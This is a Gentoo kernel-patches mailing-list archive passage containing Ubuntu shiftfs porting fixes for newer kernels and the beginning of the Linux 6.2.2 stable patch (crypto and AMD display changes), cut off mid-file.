-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
-Cc: mpagano@gentoo.org
-
-With the porting of shiftfs from 5.15 to 5.17 some filesystem-related
-functions are now passing struct user_namespace as argument, however
-shiftfs logic is still relying on the fact that these functions need to
-use the main filesystem namespace.
-
-Make sure to always use init_user_ns to prevent breakage of system
-components that rely on shiftfs.
-
-Without this fix lxd was showing some issues, like failing to create any
-file inside a container when shiftfs was used (e.g., using zfs as
-storage pool).
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
- 1 file changed, 24 insertions(+), 26 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 76c54bc12018..a21624c529f0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct user_namespace *ns,
--			    struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
-+	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(ns, lowerd, name);
-+	err = vfs_removexattr(&init_user_ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(ns, dentry, name);
--	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(&init_user_ns, dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct user_namespace *ns,
--				 struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(ns, inode, diri, mode);
-+		inode_init_owner(&init_user_ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
-@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
- }
- 
- static int shiftfs_mknod(struct user_namespace *ns,
-@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(ns, inode, mask);
-+	err = generic_permission(&init_user_ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(ns, loweri, mask);
-+	err = inode_permission(&init_user_ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(ns, dentry, attr);
-+	err = setattr_prepare(&init_user_ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(ns, lowerd, &newattr, NULL);
-+	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(ns, dentry, handler->name);
-+		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 27 Apr 2022 18:20:41 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21624c529f0..a5338dc6290c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -21,6 +21,7 @@
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
- #include <linux/fiemap.h>
-+#include <linux/pagemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Tue, 18 Oct 2022 17:09:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a5338dc6290c..34f080ae0fec 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
- }
- 
- static int shiftfs_tmpfile(struct user_namespace *ns,
--			   struct inode *dir, struct dentry *dentry,
-+			   struct inode *dir, struct file *file,
- 			   umode_t mode)
- {
- 	int err;
- 	const struct cred *oldcred;
--	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
- 
- 	if (!loweri->i_op->tmpfile)
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
--- 
-2.39.2
-
-From a04c96a9da98441b39fd8425d19d2ae6d92c0bf9 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 4 Jan 2023 10:25:30 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support linux 6.2
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 34f080ae0fec..cda74b614505 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -912,7 +912,7 @@ shiftfs_get_acl(struct inode *inode, int type, bool rcu)
- 		return NULL;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	lower_acl = get_acl(loweri, type);
-+	lower_acl = get_inode_acl(loweri, type);
- 	revert_creds(oldcred);
- 
- 	if (lower_acl && !IS_ERR(lower_acl)) {
-@@ -1026,13 +1026,13 @@ static const struct inode_operations shiftfs_dir_inode_operations = {
- 	.permission	= shiftfs_permission,
- 	.getattr	= shiftfs_getattr,
- 	.listxattr	= shiftfs_listxattr,
--	.get_acl	= shiftfs_get_acl,
-+	.get_inode_acl	= shiftfs_get_acl,
- };
- 
- static const struct inode_operations shiftfs_file_inode_operations = {
- 	.fiemap		= shiftfs_fiemap,
- 	.getattr	= shiftfs_getattr,
--	.get_acl	= shiftfs_get_acl,
-+	.get_inode_acl	= shiftfs_get_acl,
- 	.listxattr	= shiftfs_listxattr,
- 	.permission	= shiftfs_permission,
- 	.setattr	= shiftfs_setattr,
-@@ -1041,7 +1041,7 @@ static const struct inode_operations shiftfs_file_inode_operations = {
- 
- static const struct inode_operations shiftfs_special_inode_operations = {
- 	.getattr	= shiftfs_getattr,
--	.get_acl	= shiftfs_get_acl,
-+	.get_inode_acl	= shiftfs_get_acl,
- 	.listxattr	= shiftfs_listxattr,
- 	.permission	= shiftfs_permission,
- 	.setattr	= shiftfs_setattr,
--- 
-2.39.2
-
-From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
-From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Date: Tue, 31 Jan 2023 17:11:48 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1990849
-
-We haven't supported idmapped layers with shiftfs and moreover, that makes
-no sense. Once lower fs support idmapped mounts when shiftfs is not needed.
-
-Starting from linux-image-5.15.0-48-generic users started seeing EOVERFLOW
-errors from the userspace side on a trivial fs operations inside the containers.
-
-This is caused by patches ("fs: tweak fsuidgid_has_mapping()"),
-("fs: support mapped mounts of mapped filesystems"). These patches extends
-and enables idmapped mounts support in Ubuntu kernel, but the problem is
-that shiftfs was not properly ported.
-
-See also:
-("namei: prepare for idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
-("overlayfs: do not mount on top of idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
-as a reference.
-
-This patch should be appied on top of kinetic/master-next and based on the
-changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
-
-This commit together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
-have to be ported to the jammy tree too.
-
-Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
-Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
-Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Acked-by: Tim Gardner <tim.gardner@canonical.com>
-Acked-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 16 +++++++++++++---
- 1 file changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index cda74b614505..2664e1fb65d3 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	struct renamedata rd = {
--		.old_mnt_userns	= ns,
-+		.old_mnt_userns	= &init_user_ns,
- 		.old_dir	= loweri_dir_old,
- 		.old_dentry	= lowerd_old,
--		.new_mnt_userns	= ns,
-+		.new_mnt_userns	= &init_user_ns,
- 		.new_dir	= loweri_dir_new,
- 		.new_dentry	= lowerd_new,
- 	};
-@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(ns, inode))
-+	if (!inode_owner_or_capable(&init_user_ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
-@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	/*
-+	 * It makes no sense to handle idmapped layers from shiftfs.
-+	 * And we didn't support it properly anyway.
-+	 */
-+	if (is_idmapped_mnt(path.mnt)) {
-+		err = -EINVAL;
-+		pr_err("idmapped layers are currently not supported\n");
-+		goto out_put_path;
-+	}
-+
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
--- 
-2.39.2
-


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-03 12:27 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-03 12:27 UTC (permalink / raw
  To: gentoo-commits

commit:     6104eea26c521a7aaa63ea1c1f5bec42bfe213fe
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 12:27:38 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 12:27:38 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6104eea2

Linux patch 6.2.2

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |   4 +
 1001_linux-6.2.2.patch | 560 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 564 insertions(+)

diff --git a/0000_README b/0000_README
index b0db3406..b2b768d6 100644
--- a/0000_README
+++ b/0000_README
@@ -47,6 +47,10 @@ Patch:  1000_linux-6.2.1.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.1
 
+Patch:  1001_linux-6.2.2.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.2
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1001_linux-6.2.2.patch b/1001_linux-6.2.2.patch
new file mode 100644
index 00000000..d24dc949
--- /dev/null
+++ b/1001_linux-6.2.2.patch
@@ -0,0 +1,560 @@
+diff --git a/Makefile b/Makefile
+index f26824f367a99..1836ddaf2c94c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 1
++SUBLEVEL = 2
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+index 7069f51bc120e..99136adb1857f 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb0_hsphy0>, <&usb0_ssphy0>;
+ };
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+index a3cfa8113ffb2..4c960f455461c 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb1_hsphy0>, <&usb1_ssphy0>;
+ };
+diff --git a/arch/arm64/crypto/sm4-ce-gcm-glue.c b/arch/arm64/crypto/sm4-ce-gcm-glue.c
+index c450a2025ca9a..73bfb6972d3a3 100644
+--- a/arch/arm64/crypto/sm4-ce-gcm-glue.c
++++ b/arch/arm64/crypto/sm4-ce-gcm-glue.c
+@@ -135,22 +135,23 @@ static void gcm_calculate_auth_mac(struct aead_request *req, u8 ghash[])
+ }
+ 
+ static int gcm_crypt(struct aead_request *req, struct skcipher_walk *walk,
+-		     struct sm4_gcm_ctx *ctx, u8 ghash[],
++		     u8 ghash[], int err,
+ 		     void (*sm4_ce_pmull_gcm_crypt)(const u32 *rkey_enc,
+ 				u8 *dst, const u8 *src, u8 *iv,
+ 				unsigned int nbytes, u8 *ghash,
+ 				const u8 *ghash_table, const u8 *lengths))
+ {
++	struct crypto_aead *aead = crypto_aead_reqtfm(req);
++	struct sm4_gcm_ctx *ctx = crypto_aead_ctx(aead);
+ 	u8 __aligned(8) iv[SM4_BLOCK_SIZE];
+ 	be128 __aligned(8) lengths;
+-	int err;
+ 
+ 	memset(ghash, 0, SM4_BLOCK_SIZE);
+ 
+ 	lengths.a = cpu_to_be64(req->assoclen * 8);
+ 	lengths.b = cpu_to_be64(walk->total * 8);
+ 
+-	memcpy(iv, walk->iv, GCM_IV_SIZE);
++	memcpy(iv, req->iv, GCM_IV_SIZE);
+ 	put_unaligned_be32(2, iv + GCM_IV_SIZE);
+ 
+ 	kernel_neon_begin();
+@@ -158,49 +159,51 @@ static int gcm_crypt(struct aead_request *req, struct skcipher_walk *walk,
+ 	if (req->assoclen)
+ 		gcm_calculate_auth_mac(req, ghash);
+ 
+-	do {
++	while (walk->nbytes) {
+ 		unsigned int tail = walk->nbytes % SM4_BLOCK_SIZE;
+ 		const u8 *src = walk->src.virt.addr;
+ 		u8 *dst = walk->dst.virt.addr;
+ 
+ 		if (walk->nbytes == walk->total) {
+-			tail = 0;
+-
+ 			sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, dst, src, iv,
+ 					       walk->nbytes, ghash,
+ 					       ctx->ghash_table,
+ 					       (const u8 *)&lengths);
+-		} else if (walk->nbytes - tail) {
+-			sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, dst, src, iv,
+-					       walk->nbytes - tail, ghash,
+-					       ctx->ghash_table, NULL);
++
++			kernel_neon_end();
++
++			return skcipher_walk_done(walk, 0);
+ 		}
+ 
++		sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, dst, src, iv,
++				       walk->nbytes - tail, ghash,
++				       ctx->ghash_table, NULL);
++
+ 		kernel_neon_end();
+ 
+ 		err = skcipher_walk_done(walk, tail);
+-		if (err)
+-			return err;
+-		if (walk->nbytes)
+-			kernel_neon_begin();
+-	} while (walk->nbytes > 0);
+ 
+-	return 0;
++		kernel_neon_begin();
++	}
++
++	sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, NULL, NULL, iv,
++			       walk->nbytes, ghash, ctx->ghash_table,
++			       (const u8 *)&lengths);
++
++	kernel_neon_end();
++
++	return err;
+ }
+ 
+ static int gcm_encrypt(struct aead_request *req)
+ {
+ 	struct crypto_aead *aead = crypto_aead_reqtfm(req);
+-	struct sm4_gcm_ctx *ctx = crypto_aead_ctx(aead);
+ 	u8 __aligned(8) ghash[SM4_BLOCK_SIZE];
+ 	struct skcipher_walk walk;
+ 	int err;
+ 
+ 	err = skcipher_walk_aead_encrypt(&walk, req, false);
+-	if (err)
+-		return err;
+-
+-	err = gcm_crypt(req, &walk, ctx, ghash, sm4_ce_pmull_gcm_enc);
++	err = gcm_crypt(req, &walk, ghash, err, sm4_ce_pmull_gcm_enc);
+ 	if (err)
+ 		return err;
+ 
+@@ -215,17 +218,13 @@ static int gcm_decrypt(struct aead_request *req)
+ {
+ 	struct crypto_aead *aead = crypto_aead_reqtfm(req);
+ 	unsigned int authsize = crypto_aead_authsize(aead);
+-	struct sm4_gcm_ctx *ctx = crypto_aead_ctx(aead);
+ 	u8 __aligned(8) ghash[SM4_BLOCK_SIZE];
+ 	u8 authtag[SM4_BLOCK_SIZE];
+ 	struct skcipher_walk walk;
+ 	int err;
+ 
+ 	err = skcipher_walk_aead_decrypt(&walk, req, false);
+-	if (err)
+-		return err;
+-
+-	err = gcm_crypt(req, &walk, ctx, ghash, sm4_ce_pmull_gcm_dec);
++	err = gcm_crypt(req, &walk, ghash, err, sm4_ce_pmull_gcm_dec);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9c7b69d377bd3..af16d6bb974b7 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -10359,6 +10359,7 @@ int amdgpu_dm_process_dmub_aux_transfer_sync(
+ 	ret = p_notify->aux_reply.length;
+ 	*operation_result = p_notify->result;
+ out:
++	reinit_completion(&adev->dm.dmub_aux_transfer_done);
+ 	mutex_unlock(&adev->dm.dpia_aux_lock);
+ 	return ret;
+ }
+@@ -10386,6 +10387,8 @@ int amdgpu_dm_process_dmub_set_config_sync(
+ 		*operation_result = SET_CONFIG_UNKNOWN_ERROR;
+ 	}
+ 
++	if (!is_cmd_complete)
++		reinit_completion(&adev->dm.dmub_aux_transfer_done);
+ 	mutex_unlock(&adev->dm.dpia_aux_lock);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index a0741794db62a..8e824dc81dede 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -391,3 +391,27 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 		pipe_ctx->stream_res.stream_enc->funcs->set_input_mode(pipe_ctx->stream_res.stream_enc,
+ 				pix_per_cycle);
+ }
++
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
++{
++	struct dc_context *ctx = hws->ctx;
++	union dmub_rb_cmd cmd;
++
++	if (hws->ctx->dc->debug.disable_hubp_power_gate)
++		return;
++
++	PERF_TRACE();
++
++	memset(&cmd, 0, sizeof(cmd));
++	cmd.domain_control.header.type = DMUB_CMD__VBIOS;
++	cmd.domain_control.header.sub_type = DMUB_CMD__VBIOS_DOMAIN_CONTROL;
++	cmd.domain_control.header.payload_bytes = sizeof(cmd.domain_control.data);
++	cmd.domain_control.data.inst = hubp_inst;
++	cmd.domain_control.data.power_gate = !power_on;
++
++	dc_dmub_srv_cmd_queue(ctx->dmub_srv, &cmd);
++	dc_dmub_srv_cmd_execute(ctx->dmub_srv);
++	dc_dmub_srv_wait_idle(ctx->dmub_srv);
++
++	PERF_TRACE();
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index 244280298212c..c419d3dbdfee6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -41,4 +41,6 @@ unsigned int dcn314_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsig
+ 
+ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 31feb4b0edee9..25f345ff6c8f0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,7 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
+-	.hubp_pg_control = dcn31_hubp_pg_control,
++	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+ 	.dsc_pg_control = dcn314_dsc_pg_control,
+diff --git a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+index 33907feefebbd..8fea8e42cc174 100644
+--- a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
++++ b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+@@ -457,6 +457,10 @@ enum dmub_cmd_vbios_type {
+ 	 * Query DP alt status on a transmitter.
+ 	 */
+ 	DMUB_CMD__VBIOS_TRANSMITTER_QUERY_DP_ALT  = 26,
++	/**
++	 * Controls domain power gating
++	 */
++	DMUB_CMD__VBIOS_DOMAIN_CONTROL = 28,
+ };
+ 
+ //==============================================================================
+@@ -1204,6 +1208,23 @@ struct dmub_rb_cmd_dig1_transmitter_control {
+ 	union dmub_cmd_dig1_transmitter_control_data transmitter_control; /**< payload */
+ };
+ 
++/**
++ * struct dmub_rb_cmd_domain_control_data - Data for DOMAIN power control
++ */
++struct dmub_rb_cmd_domain_control_data {
++	uint8_t inst : 6; /**< DOMAIN instance to control */
++	uint8_t power_gate : 1; /**< 1=power gate, 0=power up */
++	uint8_t reserved[3]; /**< Reserved for future use */
++};
++
++/**
